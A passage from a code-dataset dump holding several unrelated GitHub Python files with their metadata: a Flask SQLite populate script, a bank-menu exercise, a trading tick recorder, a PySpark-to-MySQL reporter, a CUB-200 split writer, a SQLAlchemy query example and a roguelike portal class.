author TEXT NOT NULL,
title TEXT NOT NULL,
content TEXT NOT NULL,
date_posted TEXT NOT NULL
)
"""
insertdb = """
insert into posts ( author, title, content, date_posted) values ( :author, :title, :content, :date_posted )
"""
with sqlite3.connect("posts.db") as conn:
# with sqlite3.connect(":memory:") as conn:
cursor = conn.cursor()
cursor.execute( deletedb )
cursor.execute( createdb )
conn.commit()
cursor.executemany( insertdb, posts )
conn.commit()
cursor.execute("select * from posts")
print(cursor.fetchall())
|
majorgear/flask_blog
|
utils/populate_db.py
|
populate_db.py
|
py
| 1,163 |
python
|
en
|
code
| 0 |
github-code
|
6
|
13202825418
|
import datetime
menu = """
[d] Depositar
[s] Sacar
[e] Extrato
[q] Sair
=> """
saldo = 0
limite = 500
extrato = []
numero_saques = 0
total_saque_diario = 0
LIMITE_SAQUES = 3
while True:
opcao = input(menu)
if opcao == 'd':
valor = input('Valor do depósito (número inteiro e positivo): ')
if valor.isdigit() and int(valor) > 0:
valor = int(valor)
saldo += valor
data_hora = datetime.datetime.now()
extrato.append(('d', valor, data_hora))
print('Depósito realizado com sucesso.')
else:
print(
'Valor de depósito inválido. O valor deve ser um número inteiro positivo.')
elif opcao == 's':
if numero_saques >= LIMITE_SAQUES:
print('Quantidade de saques diários atingido.')
else:
try:
valor = int(input('Valor do saque: '))
if valor > 0 and total_saque_diario + valor <= limite:
if valor > saldo + limite:
print('Saldo insuficiente.')
else:
saldo -= valor
data_hora = datetime.datetime.now()
extrato.append(('s', valor, data_hora))
numero_saques += 1
total_saque_diario = total_saque_diario + valor
print('Saque realizado com sucesso.')
else:
print('Valor limite de saque diário atingido.')
except ValueError:
print('O valor do saque deve ser um número inteiro positivo.')
elif opcao == 'e':
print('\nExtrato Bancário')
print('#####################################################\n')
print('| OP | Data/Hora | Valor')
print('-----------------------------------------------------')
for operacao, valor, data_hora in extrato:
if operacao == 'd':
print(
f'| D | {data_hora.strftime("%d-%m-%Y %H:%M:%S")} | R${valor}')
elif operacao == 's':
print(
f'| S | {data_hora.strftime("%d-%m-%Y %H:%M:%S")} |-R${valor}')
print('-----------------------------------------------------')
print('#####################################################')
print(
f'| Saldo em {data_hora.strftime("%d-%m-%Y %H:%M:%S")} -> R$ {saldo}')
print('#####################################################\n')
elif opcao == 'q':
print('Você saiu do sistema...')
break
else:
print('Opção inválida.')
|
ElPablitoBR/btc-c-d-desafio1
|
desafio.py
|
desafio.py
|
py
| 2,754 |
python
|
pt
|
code
| 0 |
github-code
|
6
|
74843183226
|
# encoding: UTF-8
from ctaStrategyTemplate import *
from ctaObject import CtaBarData
########################################################################
class DataRecorder(CtaStrategyTemplate):
"""
纯粹用来记录历史数据的工具(基于CTA策略),
建议运行在实际交易程序外的一个vn.trader实例中,
本工具会记录Tick和1分钟K线数据。
"""
#----------------------------------------------------------------------
def __init__(self, ctaEngine, name, setting=None):
"""Constructor"""
super(DataRecorder, self).__init__(ctaEngine, name, setting)
self.strategyClassName = 'DataRecorder'
self.author = u'用Python的交易员'
self.tickDbName = 'VtTrader_Tick_Db'
self.barDbName = 'VtTrader_1Min_Db'
self.paramList.append('author')
# 数据记录相关
self.bar = None # K线数据对象
self.barMinute = -1 # 当前的分钟,初始化设为-1
#----------------------------------------------------------------------
def init(self):
"""初始化"""
self.writeCtaLog(u'数据记录工具%s初始化' %self.name)
#----------------------------------------------------------------------
def start(self):
"""启动策略(必须由用户继承实现)"""
self.writeCtaLog(u'数据记录工具%s启动' %self.name)
#----------------------------------------------------------------------
def stop(self):
"""停止策略(必须由用户继承实现)"""
self.writeCtaLog(u'数据记录工具%s停止' %self.name)
#----------------------------------------------------------------------
def onTick(self, tick):
"""收到行情TICK推送"""
# 收到Tick后,首先插入到数据库里
self.insertTick(tick)
# 计算K线
tickMinute = tick.datetime.minute
if tickMinute != self.barMinute: # 如果分钟变了,则把旧的K线插入数据库,并生成新的K线
if self.bar:
self.onBar(self.bar)
bar = CtaBarData() # 创建新的K线,目的在于防止之前K线对象在插入Mongo中被再次修改,导致出错
bar.vtSymbol = tick.vtSymbol
bar.symbol = tick.symbol
bar.exchange = tick.exchange
bar.open = tick.lastPrice
bar.high = tick.lastPrice
bar.low = tick.lastPrice
bar.close = tick.lastPrice
bar.date = tick.date
bar.time = tick.time
bar.datetime = tick.datetime # K线的时间设为第一个Tick的时间
bar.volume = tick.volume
bar.openInterest = tick.openInterest
self.bar = bar # 这种写法为了减少一层访问,加快速度
self.barMinute = tickMinute # 更新当前的分钟
else: # 否则继续累加新的K线
bar = self.bar # 写法同样为了加快速度
bar.high = max(bar.high, tick.lastPrice)
bar.low = min(bar.low, tick.lastPrice)
bar.close = tick.lastPrice
bar.volume = bar.volume + tick.volume # 成交量是累加的
bar.openInterest = tick.openInterest # 持仓量直接更新
#----------------------------------------------------------------------
def onOrder(self, order):
"""收到委托变化推送"""
pass
#----------------------------------------------------------------------
def onTrade(self, trade):
"""收到成交推送"""
pass
#----------------------------------------------------------------------
def onBar(self, bar):
"""收到Bar推送"""
self.insertBar(bar)
|
LonelyHunter7/Backtesting_Syestem
|
vn.trader/ctaDataRecorder.py
|
ctaDataRecorder.py
|
py
| 4,091 |
python
|
en
|
code
| 1 |
github-code
|
6
|
42104820373
|
from pyspark import SparkContext, SparkConf
from pyspark.sql import SparkSession
class Reporter(object):
def __init__(self, project, src_files, dst_table, keyfile, config):
self.project = project
self.src_files = src_files
self.dst_table = dst_table
self.keyfile = keyfile
self.driver = config.get('mysql', 'driver')
self.url = config.get('mysql', 'url')
self.user = config.get('mysql', 'user')
self.password = config.get('mysql', 'password')
self.jar_dir = config.get('environment', 'jar_dir')
self.submit_host = config.get('environment', 'submit_host')
self.python_lib = config.get('environment', 'python_lib')
self.python_files = self.get_list(config.get('environment', 'python_files'))
def get_list(self, csv):
raw_list = csv.split(',')
stripped_list = [v.strip() for v in raw_list]
return stripped_list
def get_context(self, app_name, project, keyfile, submit_host, python_lib, python_files):
# generate environment variables
full_path_list = ['file:{python_lib}/{file}'.format(python_lib=python_lib, file=file) for file in python_files]
full_paths = ','.join(full_path_list)
python_path = ':'.join(python_files)
# cluster execution
conf = SparkConf() \
.setMaster(submit_host) \
.setAppName(app_name) \
.set('spark.yarn.dist.files','{full_paths}'.format(full_paths=full_paths)) \
.setExecutorEnv('PYTHONPATH','{python_path}'.format(python_path=python_path)) \
context = SparkContext(conf=conf)
# Setup gcs Hadoop Configurations programmatically
# Require Google Service account
context._jsc.hadoopConfiguration().set("fs.gs.impl", "com.google.cloud.hadoop.fs.gcs.GoogleHadoopFileSystem")
context._jsc.hadoopConfiguration().set("fs.gs.project.id", project)
context._jsc.hadoopConfiguration().set("google.cloud.auth.service.account.enable", "true")
context._jsc.hadoopConfiguration().set("google.cloud.auth.service.account.json.keyfile", keyfile)
return context
def get_session(self, context):
session = SparkSession.builder \
.config(conf=context.getConf()) \
.getOrCreate()
return session
def get_src_df(self, session, src_files, type='json'):
if type == 'json' :
df = session.read.format("json") \
.option("header", "false") \
.option("inferSchema", "true") \
.load(src_files)
else :
df = session.read.format("csv") \
.option("delimiter", type) \
.option("header", "false") \
.load(src_files)
return df
def write_df_to_mysql(self, df):
df.write.format('jdbc').options(
url=self.url,
driver=self.driver,
dbtable=self.dst_table,
user=self.user,
password=self.password).mode('append').save()
|
ubermen/anomaly_detector
|
estimator/reporter/engines.py
|
engines.py
|
py
| 2,795 |
python
|
en
|
code
| 1 |
github-code
|
6
|
10930434466
|
import numpy as np
from os import listdir
from os.path import isfile, isdir, join
import os
import random
cwd = os.getcwd()
data_path = '/data/CUB_200_2011'
savedir = './'
dataset_list = ['base','val','novel']
#if not os.path.exists(savedir):
# os.makedirs(savedir)
folder_list = [f for f in listdir(join(data_path, 'train'))]
classfile_list_all = []
for i, folder in enumerate(folder_list):
classfiles = []
for split in ['train', 'test']:
folder_path = join(join(data_path, split), folder)
classfiles += [join(split, join(folder, cf)) for cf in listdir(folder_path)]
classfile_list_all.append(classfiles)
random.shuffle(classfile_list_all[i])
for dataset in dataset_list:
file_list = []
label_list = []
for i, classfile_list in enumerate(classfile_list_all):
if 'base' in dataset:
if (i%2 == 0):
file_list = file_list + classfile_list
label_list = label_list + np.repeat(i, len(classfile_list)).tolist()
if 'val' in dataset:
if (i%4 == 1):
file_list = file_list + classfile_list
label_list = label_list + np.repeat(i, len(classfile_list)).tolist()
if 'novel' in dataset:
if (i%4 == 3):
file_list = file_list + classfile_list
label_list = label_list + np.repeat(i, len(classfile_list)).tolist()
fo = open(savedir + dataset + ".json", "w")
fo.write('{"label_names": [')
fo.writelines(['"%s",' % item for item in folder_list])
fo.seek(0, os.SEEK_END)
fo.seek(fo.tell()-1, os.SEEK_SET)
fo.write('],')
fo.write('"image_names": [')
fo.writelines(['"%s",' % item for item in file_list])
fo.seek(0, os.SEEK_END)
fo.seek(fo.tell()-1, os.SEEK_SET)
fo.write('],')
fo.write('"image_labels": [')
fo.writelines(['%d,' % item for item in label_list])
fo.seek(0, os.SEEK_END)
fo.seek(fo.tell()-1, os.SEEK_SET)
fo.write(']}')
fo.close()
print("%s -OK" %dataset)
|
alinlab/PsCo
|
splits/cub200/write_cub_filelist.py
|
write_cub_filelist.py
|
py
| 2,032 |
python
|
en
|
code
| 42 |
github-code
|
6
|
23135790413
|
# -*- coding: utf-8 -*-
"""
Created on Tue Apr 9 21:16:51 2019
@author: eikivi
"""
from sqlalchemy import Column, Integer, String
from sqlalchemy import create_engine
from sqlalchemy import or_
engine = create_engine('sqlite:///sales.db', echo = False)
from sqlalchemy.ext.declarative import declarative_base
Base = declarative_base()
class Customers(Base):
__tablename__ = 'customers'
id = Column(Integer, primary_key = True)
name = Column(String)
address = Column(String)
email = Column(String)
from sqlalchemy.orm import sessionmaker
Session = sessionmaker(bind = engine)
session = Session()
try:
# result = session.query(Customers).filter(or_(Customers.id>2, Customers.name.like('Ei%')))
#result = session.query(Customers).filter(Customers.id<2, Customers.name.like('Ja%'))
result = session.query(Customers).filter(Customers.id != 2)
#result = session.query(Customers).one()
except:
session.rollback()
raise
finally:
session.close()
print("")
#print(result)
for row in result:
print("")
print ("ID:", row.id, "Name: ",row.name, "Address:",row.address, "Email:",row.email)
|
baadam3/ICS0019_Advanced_python_solutions
|
Examples/Database_code/SQLAlchemyFilter7.py
|
SQLAlchemyFilter7.py
|
py
| 1,137 |
python
|
en
|
code
| 0 |
github-code
|
6
|
42933813764
|
import pyherc
from pyherc.aspects import log_debug
class Portal():
"""
Portal linking two levels together
"""
@log_debug
def __init__(self, icons, level_generator_name):
"""
Default constructor
:param icons: (my_icon, icon for other end)
:type icons: (integer, integer)
:param level_generator_name: name of level generator for proxy portals
:type level_generator_name: String
"""
super().__init__()
self.level = None
self.location = ()
self.__icons = icons
self.__other_end = None
self.exits_dungeon = False
self.level_generator_name = level_generator_name
self.model = None
self.__update_listeners = []
@log_debug
def get_other_end(self):
"""
Returns the other end of the portal
:param level_generator_factory: factory to generate level generators
:type level_generator_factory: LevelGeneratorFactory
:returns: other end of the portal
:rtype: Portal
"""
if self.__other_end is None:
pyherc.vtable['\ufdd0:generate-level'](self.level_generator_name, self)
return self.__other_end
@log_debug
def set_other_end(self, portal):
"""
Set the other end of the portal
:param portal: portal where this one leads
:type portal: Portal
"""
self.__other_end = portal
@log_debug
def __get_icon(self):
"""
Get icon to display this portal
:returns: icon of the portal
:rtype: integer
"""
return self.__icons[0]
@log_debug
def __set_icon(self, icon):
"""
Set icon to display this portal
:param icon: icon to use for the portal
:type icon: integer
"""
if self.__icons is None:
self.__icons = (None, None)
self.__icons = (icon, self.__icons[1])
@log_debug
def __get_other_end_icon(self):
"""
Get icon used for other end of this portal
:returns: icon of the other end
:rtype: integer
"""
return self.__icons[1]
@log_debug
def register_for_updates(self, listener):
"""
Register listener to receive updates for this entity
:param listener: listener to add
:type listener: Listener
.. versionadded:: 0.5
"""
self.__update_listeners.append(listener)
@log_debug
def remove_from_updates(self, listener):
"""
Remove listener
:param listener: listener to remove
:type listener: Listener
.. versionadded:: 0.5
"""
self.__update_listeners.remove(listener)
@log_debug
def notify_update_listeners(self, event):
"""
Notify all listeners registered for update of this entity
:param event: event to relay to update listeners
:type event: Event
.. versionadded:: 0.5
"""
for listener in self.__update_listeners:
listener.receive_update(event)
icon = property(__get_icon, __set_icon)
other_end_icon = property(__get_other_end_icon)
|
tuturto/pyherc
|
src/pyherc/data/portal.py
|
portal.py
|
py
| 3,215 |
python
|
en
|
code
| 43 |
github-code
|
6
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.